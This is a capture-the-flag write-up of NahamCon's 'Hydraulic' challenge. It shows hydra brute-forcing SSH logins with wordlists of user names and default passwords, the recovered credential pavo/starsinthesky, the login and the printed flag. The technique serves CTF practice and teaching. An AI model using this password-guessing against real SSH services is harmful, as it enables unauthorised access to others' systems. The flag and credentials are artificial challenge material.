CTFtime.org

Hydraulic

by cyberwookee / cyberwookee

Rating:

# Hydraulic
#hydra #wordlists

```
This is Stage 2 of Path 5 in The Mission. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges.

Gain access with the information you have gathered thus far and retrieve the flag.

Press the Start button on the top-right to begin this challenge.
Connect with:
ssh -p 30337 challenge.nahamcon.com
```

So we have a bit of information available from the previous challenge going into this. In particular, we have some account names and some default passwords and so making those into some lists might be a good way to start off.

## Hydra

After making those dictionaries, throwing [hydra](https://allabouttesting.org/examples-of-kali-linux-hydra-tool/#:~:text=Hydra%20is%20a%20pre%2Dinstalled,target%20to%20identify%20correct%20credentials.) at the SSH login with the wordlists generated following the previous challenge `Lyra`

```
$ hydra -s 30337 -L users.txt -P default-passwords.txt 35.239.227.150 -t 4 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-13 21:39:41
[DATA] max 4 tasks per 1 server, overall 4 tasks, 520 login tries (l:8/p:65), ~130 tries per task
[DATA] attacking ssh://35.239.227.150:30337/
[STATUS] 36.00 tries/min, 36 tries in 00:01h, 484 to do in 00:14h, 4 active
[STATUS] 29.67 tries/min, 89 tries in 00:03h, 431 to do in 00:15h, 4 active
[30337][ssh] host: 35.239.227.150 login: pavo password: starsinthesky
[STATUS] 29.29 tries/min, 205 tries in 00:07h, 315 to do in 00:11h, 4 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-13 21:49:39
```

Seems our (now) good friend `pavo` didn't change his password, and inside his `home` directory we find our flag!

```
$ ssh -p 30337 [email protected]
$ ll
total 24
drwxr-xr-x 1 pavo pavo 4096 Mar 6 06:16 ./
drwxr-xr-x 1 root root 4096 Mar 6 06:15 ../
-rw-r--r-- 1 pavo pavo 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 pavo pavo 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 pavo pavo 807 Feb 25 2020 .profile
-rw-r--r-- 1 pavo pavo 39 Mar 6 06:15 flag.txt
$ cat flag.txt
flag{cadbbfd75d2547700221f8c2588e026e}
```

Comments